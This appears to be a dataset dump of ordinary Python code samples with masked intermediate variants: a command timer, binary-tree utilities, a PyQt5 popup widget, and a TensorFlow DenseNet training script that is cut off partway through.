code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
import os
import subprocess
import sys
import time
# print sys.argv
start = time.time()
subprocess.call(sys.argv[1:], shell=True)
stop = time.time()
print "\nTook %.1f seconds" % (stop - start)
|
normal
|
{
"blob_id": "530ec3df27cc4c8f0798566f0c66cfbffe510786",
"index": 8611,
"step-1": "import os\r\nimport subprocess\r\nimport sys\r\nimport time\r\n\r\n# print sys.argv\r\nstart = time.time()\r\nsubprocess.call(sys.argv[1:], shell=True)\r\nstop = time.time()\r\nprint \"\\nTook %.1f seconds\" % (stop - start)\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from queue import Queue
class Node():
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
def array_to_tree_dfs(array):
n = len(array)
if n>0:
root = Node(array[0])
def dfs(node, index):
# if index >= n:
# return
# else:
if 2*(index+1) -1 < n and array[2*(index+1) -1] is not None:
node.left = Node(array[2*(index+1) -1])
dfs(node.left, 2*(index+1) -1)
if 2*(index+1) < n and array[2*(index+1)] is not None:
node.right = Node(array[2*(index+1)])
dfs(node.right, 2*(index+1))
return
dfs(root, 0)
return root
def tree_to_array_bfs(root):
q = Queue(maxsize = 0) # queue with infinity size
q.put(root)
array = []
def bfs():
if q.empty():
return
else:
node = q.get()
array.append(node.value)
if node.left != None:
q.put(node.left)
if node.right != None:
q.put(node.right)
bfs()
return
bfs()
return array
def findClosestValueInBst(tree, target):
distance = abs(tree.value - target)
value = tree.value
def dfs(node):
nonlocal distance, value
# stop condition
if(node is None):
return value
if(node.value == target):
return target
if abs(node.value - target) < distance:
value = node.value
distance = abs(value - target)
# recursion part
if(node.value > target):
return dfs(node.left)
elif(node.value < target):
return dfs(node.right)
return dfs(tree)
if __name__ == '__main__':
array = [5,3,10,2,4,8] + [None]*6 + [9] + [None]*2
root = array_to_tree_dfs(array)
new_array = tree_to_array_bfs(root)
print(new_array)
print(findClosestValueInBst(root, 6))
|
normal
|
{
"blob_id": "a52762fb13c04ced07a41a752578c4173d1eac42",
"index": 8350,
"step-1": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\n<mask token>\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5, 3, 10, 2, 4, 8] + [None] * 6 + [9] + [None] * 2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root)\n print(new_array)\n print(findClosestValueInBst(root, 6))\n",
"step-4": "from queue import Queue\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5, 3, 10, 2, 4, 8] + [None] * 6 + [9] + [None] * 2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root)\n print(new_array)\n print(findClosestValueInBst(root, 6))\n",
"step-5": "from queue import Queue\n\nclass Node():\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n>0:\n root = Node(array[0])\n\n def dfs(node, index):\n # if index >= n:\n # return\n # else:\n if 2*(index+1) -1 < n and array[2*(index+1) -1] is not None:\n node.left = Node(array[2*(index+1) -1])\n dfs(node.left, 2*(index+1) -1)\n if 2*(index+1) < n and array[2*(index+1)] is not None:\n node.right = Node(array[2*(index+1)])\n dfs(node.right, 2*(index+1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize = 0) # queue with infinity size\n q.put(root)\n array = []\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n \n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n \n def dfs(node):\n nonlocal distance, value\n # stop condition\n if(node is None):\n return value\n if(node.value == target):\n return target\n\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n\n # recursion part\n if(node.value > target):\n return dfs(node.left)\n elif(node.value < target):\n return dfs(node.right)\n\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5,3,10,2,4,8] + [None]*6 + [9] + [None]*2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root) \n print(new_array)\n print(findClosestValueInBst(root, 6))\n \n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import sys
import time
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import *
class PromptMessage(QWidget):
def __init__(self, parent = None):
super(PromptMessage,self).__init__(parent)
self.m_show_tm = QTimer()
self.m_stay_tm = QTimer()
self.m_close_tm = QTimer()
self.m_point = QPoint()
self.m_stay=2
def set_stay(self, stay):
self.m_stay = stay
def show_message(self, message_list):
self.m_show_tm.timeout.connect(self.on_move)
layout=QGridLayout()
num=len(message_list)
for i in range(num):
label=QLabel()
label.setText(message_list[i])
layout.addWidget(label, i, 0)
self.setLayout(layout)
self.adjustSize()
rect = QApplication.desktop().availableGeometry()
rect1 = QApplication.desktop().screenGeometry ()
self.m_desktop_height=rect.height()
self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)
self.setWindowFlags(Qt.FramelessWindowHint);
self.m_point.setX(rect.width() - self.width())
self.m_point.setY(rect.height() - self.height() - (rect1.height() - rect.height()))
#self.move(self.m_point)
self.setWindowOpacity(0.8)
self.show()
self.m_show_tm.start(100)
def on_move(self):
self.m_desktop_height = self.m_desktop_height - 10
self.move(self.m_point.x(), self.m_desktop_height)
if self.m_desktop_height <= self.m_point.y():
self.m_show_tm.stop()
time.sleep(self.m_stay)
self.close()
import sys
def logs():
print(sys._getframe().f_code.co_name)
print(sys._getframe().f_back.f_code.co_name)
print(sys._getframe().f_back.f_lineno)
print(sys._getframe().f_back.f_code.co_filename)
def get_cur_info() :
logs() #模拟写日志
if __name__ == "__main__":
from CommonAPI.Log import LOG_ERROR
|
normal
|
{
"blob_id": "18a49d46b39fe6e00e2ad137984cceab82f1e94b",
"index": 2422,
"step-1": "<mask token>\n\n\nclass PromptMessage(QWidget):\n <mask token>\n <mask token>\n <mask token>\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PromptMessage(QWidget):\n <mask token>\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PromptMessage(QWidget):\n\n def __init__(self, parent=None):\n super(PromptMessage, self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay = 2\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n\n\ndef logs():\n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass PromptMessage(QWidget):\n\n def __init__(self, parent=None):\n super(PromptMessage, self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay = 2\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n\n\ndef logs():\n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\n\n\ndef get_cur_info():\n logs()\n\n\n<mask token>\n",
"step-5": "import sys\nimport time\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import *\n\n\nclass PromptMessage(QWidget):\n def __init__(self, parent = None):\n super(PromptMessage,self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay=2\n \n def set_stay(self, stay):\n self.m_stay = stay \n \n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout=QGridLayout()\n num=len(message_list)\n for i in range(num):\n label=QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout) \n\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry ()\n self.m_desktop_height=rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint);\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() - rect.height()))\n #self.move(self.m_point)\n self.setWindowOpacity(0.8) \n self.show()\n self.m_show_tm.start(100)\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n \nimport sys \ndef logs(): \n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\ndef get_cur_info() : \n logs() #模拟写日志 \n \nif __name__ == \"__main__\":\n from CommonAPI.Log import LOG_ERROR\n \n ",
"step-ids": [
2,
4,
6,
7,
10
]
}
|
[
2,
4,
6,
7,
10
] |
def densenet(D,DT,F,model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
###############
# load training / testing set from CrossVal folder,
# names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'
# name for testing set, 'D1_1st_fold_test.mat'
###############
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D'+Dataset)
print("path " ,path)
if data_type == 'original':
Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))
else:
Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i !=num_of_test:
list_to_display.append(int(iteration_to_display*(i+1)))
del i
total_fm_Block_1 = fm1+(num_layers*k_fm)
total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)
total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)
fc_nodes = [total_fm_Block_3 ]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0,2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0,2])
Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels,axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape,n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial,name=n)
def bias_variable(shape,n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial,name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name="W", with_bias=False):
W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)
conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')
if with_bias:
return conv + bias_variable([ out_features ])
return conv
def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True, training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features, kernel_size, name="W"+str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training, keep_prob, name="Block_"):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name="W1", with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name="Block_1")
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_2")
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_2"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_3")
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_3"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope("Dense_Last_lyr"):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes],"w_fc3")
b_fc3 = bias_variable([number_of_classes],"b_fc3")
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])
with tf.name_scope("Xent"):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope("train"):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end-batch_size)
images = Train_Images[(index_end-batch_size):total_trainImages, :]
labels = Train_Labels[(index_end-batch_size):total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:index_end, :]))
labels = np.vstack((labels, Train_Labels[index:index_end, :]))
batch = (images, labels)
index = index_end
index_end = index + batch_size
else:
batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' % elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration,i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop,
predicted_labels_printop,prediction_prob_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)
predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)
prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)
Accuracy = Accuracy/num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels,
'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = (itrt_index * batch_size) / total_trainImages
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1],
keep_prob: 1.0, training:False})
print('step %d, training accuracy %g' % (i, train_accuracy))
_, loss = sess.run([train_step, cross_entropy],
feed_dict={x: batch[0], y_: batch[1],
keep_prob: dropout_prob, training:True})
iteration_cost = 0 # Defines a cost related to an epoch
num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size minibatch_size in the train set
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print ('Loss: ',loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
